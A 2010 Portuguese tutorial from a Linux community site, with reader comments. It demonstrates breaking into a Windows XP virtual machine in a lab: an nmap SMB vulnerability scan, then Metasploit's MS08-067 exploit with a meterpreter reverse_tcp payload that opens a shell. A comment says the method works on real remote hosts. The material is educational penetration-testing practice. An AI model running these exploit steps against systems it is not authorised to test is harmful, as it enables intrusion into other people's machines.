Intrusão simples com Metasploit

Salve salve galera do VOL! Aqui vai mais um artigo falando sobre o framework Metasploit. Irei demonstrar algumas técnicas simples/básicas de scanning e fingerprint usando o Metasploit e em seguida exploraremos uma máquina MS para obtermos uma shell. Let`s go???

[ Hits: 144.938 ]

Por: Roberto Soares (3spreto) em 26/03/2010 | Blog: http://codesec.blogspot.com


Começando!



Bom galera, vamos começar!

Para que você possa ter uma boa noção de como o Metasploit realmente funciona, nada melhor que conseguir obter o acesso a uma máquina (virtual) e assim poder testar e estudar todas suas funcionalidades, ficando cada dia mais "afiado" em seus testes de intrusão. Sim, este artigo é bem básico.

O cenário utilizado foi o seguinte:
Linux: Intrusão Simples com Metasploit
Neste caso são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs estão configuradas como bridge.
  • 1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
  • 2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.

Quer saber mais sobre Virtualbox? Digite "virtualbox" no campo de pesquisa aqui do VOL que encontrará ótimos artigos/dicas sobre o mesmo.

Scanning com Nmap e Metasploit

Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.

Abra um terminal no micro com o Backtrack e digite o seguinte comando:

# nmap -v --script=smb-check-vulns 192.168.0.0/24
  • -v = Modo Verbose
  • --script=smb-check-vulns = Script para verificar vulnerabilidades conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
  • 192.168.0.0/24 = Range de IP utilizado em minha rede local.

Linux: Intrusão Simples com Metasploit
Se repararem, no host com endereço IP 192.168.0.186, verá que são mostradas as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.

Certo, descobrimos um host dentro da nossa LAN que está possivelmente vulnerável ao nosso ataque pretendido! Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...
Linux: Intrusão Simples com Metasploit
Obtemos nosso console do msf. Dei uma personalizada na saída. :-)

Feito isto, vamos efetuar a intrusão na máquina. Os comandos são os seguintes:

use exploit/windows/smb/ms08_067_netapi #Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 #Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp #Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 #Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit #E finalmente executamos nosso exploit.

Observem a imagem abaixo.
Linux: Intrusão Simples com Metasploit
Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.
Linux: Intrusão Simples com Metasploit
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.

    Próxima página

Páginas do artigo
   1. Começando!
   2. Opções Metasploit
Outros artigos deste autor

Integração Contínua com Jenkins - Instalação (Parte 1)

Vazamento de informações vitais via "HP Operations Manager Perfd"

Metasploit Exploitation

CouchDB - For Fun and Profit

Recon and Scan with Metasploit

Leitura recomendada

VPN em Linux com OpenVPN

Procedimento para descoberta de chave WEP

Teste de Intrusão com Metasploit

wlmproxy - um proxy superior

Hidden Service - Disponibilizando seu site na Deep Web através do Tor

  
Comentários
[1] Comentário enviado por mbfagundes em 26/03/2010 - 13:25h

hehehe... esse foi a simples, imagina o que foi dado no treinamento metasploit em campinas ... akilo la nao tem como mensurar né ... HandsUP

[2] Comentário enviado por marcio.itpro em 26/03/2010 - 13:27h

É, fiquei preocupado agora.

[3] Comentário enviado por Gilmar_GNU/slack em 26/03/2010 - 13:47h

Curti a matéria.
Ja que não uso o Backtrack então ja tenho como base o slackware.
Imagina isso com um monte de lan de fundo de quintal rolando aqui.

hahahahaah

Só desastre.

[4] Comentário enviado por eduardo em 26/03/2010 - 14:09h

Muito bom o artigo.
Parabéns

[5] Comentário enviado por Lisandro em 26/03/2010 - 15:55h

Aatabom...

[6] Comentário enviado por jonasricardo em 26/03/2010 - 19:38h

vamos aos testes entao, valew muito bom

[7] Comentário enviado por paulorvojr em 27/03/2010 - 11:05h

belo artigo, parabens

a mod distro backtrack tem centenas de exploits prontinhos pra serem usados rsrsrsrs

o chato disso é que uns kiddie´s vão logo pensar que é hacker e teu artigo vai parar naquelas páginas feitas em html com uma caveira digital em GIF, invadindo o XP!! rsrsrs

pessoal é fogo...rsrsrs

adoro o backtrack, uso mais pra testar vulnerabilidade de servers e clients.

abraços!


[8] Comentário enviado por removido em 27/03/2010 - 13:33h

Li recentemente na INFO que os usuários de software livre são justamente os que mais sofrem de fraudes e invasões em seus sistemas, justamente por pensarem que estão imunes à qualquer ameaça digital. Entretanto, não há sistema para imune a burrice humana : D

A melhor maneira de nos defendermos de um atual ataque é sabendo como eles funcionam de antemão. Alguns usuários tradicionais talvez achem um absurdo ensinar técnicas de invasão, mas a verdade é que somente aprendendo-as é possível defender-se de forma mais eficiente.

Parabéns pelo artigo.

[9] Comentário enviado por lestatwa em 29/03/2010 - 13:15h

Parabéns pelo artigo!
A uns anos atrás quando eu iniciava na área senti falta de um material bem explicado.
O problema da informação, é que... bem... tem gente que "com poder demais" nas mãos, faz cagada!

[10] Comentário enviado por marcus.andrade8 em 25/04/2010 - 07:46h

Funcionou blz com o xpsp3 (lembrando que para esse S.O. a falha é outra, porém da mesma linha). Fiz um vídeo mostrando o procedimento. Para proteger o sistema, basta aplicar as atualizações de segurança, ou no caso dos meus testes, habilitar o firewall do Windows foi tudo o que precisei. Abraços!
http://www.youtube.com/watch?v=9ydB1dApenU

[11] Comentário enviado por peregrino em 02/07/2010 - 14:31h

Boa Tarde otimo tutorial, fiz uns testes e realmente funciona so gostaria de saber e quando o firewall do windows xp esta abilitado o que eu poderia fazer para ter sucesso

obrigado

[12] Comentário enviado por renato_pacheco em 17/01/2011 - 14:31h

Poxa... estou tentando testar a ferramenta, mas quando eu encontro uma máquina vulnerável, eu executo o exploit direitim, mas num cria a sessão (sessions). O q está dando d errado? A msg é essa:

[*] Exploit completed, but no sessions was created.

Ah! Quando listo as sessões, mostra (sessions -l):

Active sessions
==========

No active sessions.


[13] Comentário enviado por roberto_espreto em 20/01/2011 - 18:04h

@renato_pacheco

Verifique o firewall do windows se está ativo ou não! Está executando contra um win SP2 ou SP3? Está na mesma range de IP? Passe mais detalhes que conseguirei de ajudar!

Att,

[14] Comentário enviado por vinteumdoonze em 18/09/2011 - 16:29h

Cara, parabens, muito bom esse seu artigo, me ajudou a fazer um trabalho da faculdade, não se preocupe eu divulguei a fonte.
Muito bom..

[15] Comentário enviado por mikeitaly em 29/09/2011 - 16:17h

faço essa pergunta a todos que usam backtrack..
estou usando a versao 5 R1.. es estou fazendo testes na minha rede interna..

comigo o resultado ja foi diferente..
...
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
...

Reparem ele diz que "regsvc DoS" , " SMBv2 DoS " , " MS06-025 " , " MS07-029 " nao foram checados se tinham falhas ou naum, porque no script que foi usado naum tinha o parametro
" --script-args=unsafe=1 " ..
como eu faço pra adicionar esse parametro e onde fica o script para eu adicionar esse parametro?

grato! mikE!

[16] Comentário enviado por renato_pacheco em 29/09/2011 - 16:19h

@mikeitaly,

Seguindo o exemplo:

# nmap -v --script=smb-check-vulns --script-args=unsafe=1 192.168.0.0/24

[17] Comentário enviado por mikeitaly em 29/09/2011 - 16:36h

cara creio que nao é assim.. pq eu ja testei esse procedimento... creio que eu tenha que editar na unha o script que esta sendo usado..

=/..

[18] Comentário enviado por renato_pacheco em 29/09/2011 - 16:42h

@mikeitaly,

Bródi, kbei d fazer e funcionou aki comigo. Teste antes d questionar.

[19] Comentário enviado por meetgyn em 15/02/2012 - 01:48h

Cara curti muito seu trabalho porem estou com uma dificuldade igual a do colega acima:
Primeiro quero saber se esta tecnica ai funciona remotamente. Pois fiz tudo via vmware e deu certo, mais remoto não funcionou.
segundo Instalei o metasploit em meu mandriva powerpack ta tudo certinho mais quando vou executar o procedimento ele retorna o erro "Exploit completed, but no session created"
teria com dar uma ajuda?




cleytomgyn@yahoo.com.br

[20] Comentário enviado por igor_rocha em 27/03/2012 - 03:59h

Funciona somente em Vm´s ¬¬'

[21] Comentário enviado por roberto_espreto em 27/03/2012 - 07:31h

Este tutorial foi criado baseando-se em máquinas virtuais, porém, também funciona em máquinas reais e remotas, basta apenas atentar-se a regras de encaminhamento de portas (Port Forwarding) entre outros por menores. Adapte-se! :D

[22] Comentário enviado por JonatasLaet em 28/12/2012 - 20:13h

Usei o VMware pras duas. Ambas com as configurações mencionadas. Mas o resultado não foi o esperado. Abaixo coloquei o link da PrintScreen do resultado. Ajude-me quem puder.

http://i.troll.ws/a1db30ad.png
http://i.troll.ws/d01bcd01.png

[23] Comentário enviado por ftalinux em 31/03/2013 - 14:47h

cara esse tutorial seu fala pro c!!!
vc que informa para os usuarios que voce sabe utilizar essa ferramenta neh!!!
pq isso nao foi um tutorial !!
vc e robo ????
esses topicos ae acaba com a comunidade d vcs,inrriquece a pagina de porcaria !!!!!! vivaolinux ta meio largado,,,,,,,FRACO FRACO FRACO

[24] Comentário enviado por gseis em 02/03/2016 - 02:11h

Sem querer ser daqueles iniciantes Linux enjoados/chatos ou aquela molecada de 10 anos invadindo orkut, mas se possível gostaria de obter mais info sobre o tema, também gostaria de aprender a explorar vulnerabilidade de sites, pra ser mais exato gostaria de entender e conhecer "conteúdos crackers" (Mais polêmicos que mamilos).

Sou novo no Linux (Uso Mint há uma semana), entendo nada ou quase nada de rede e vulnerabilidade. Se alguém souber de alguns links para iniciar os estudos sobre os temas citados ficarei bastante agradecido.

[25] Comentário enviado por torver em 28/10/2016 - 00:27h

Eu to com problema no script -v --script=smb-check-vulns , tentei varias coisas aqui que vi em outros foruns (por exemplo especificar a vulnerabilidade) contudo o erro continua, alguem ja passou por isso?



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner
Linux banner

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts